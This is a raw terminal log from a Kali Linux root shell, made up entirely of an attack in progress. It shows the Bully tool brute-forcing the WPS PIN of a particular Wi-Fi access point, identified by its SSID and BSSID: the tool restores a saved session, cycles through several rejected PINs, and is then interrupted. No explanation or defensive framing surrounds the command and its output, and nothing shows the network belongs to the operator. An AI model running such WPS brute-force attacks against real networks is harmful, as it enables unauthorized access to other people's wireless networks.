root@kali:~# bully mon0 -c X -b 84:C9:B2:XX:XX:XX -v 3
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Using 'f2:af:63:61:fc:6b' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '84:c9:b2:0a:e1:22' on channel '6'
[+] Got beacon for 'Xxxx wi-fi' (84:c9:b2:0a:e1:22)
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/84c9b20ae122.run'
[+] Index of starting pin number is '0023000'
[+] Last State = 'NoAssoc' Next pin '71092997'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '18102994'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '24942997'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '20102999'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '07132995'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '58762998'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '38872990'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '21282997'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '98162994'
^C
Saved session to '/root/.bully/84c9b20ae122.run'
root@kali:~#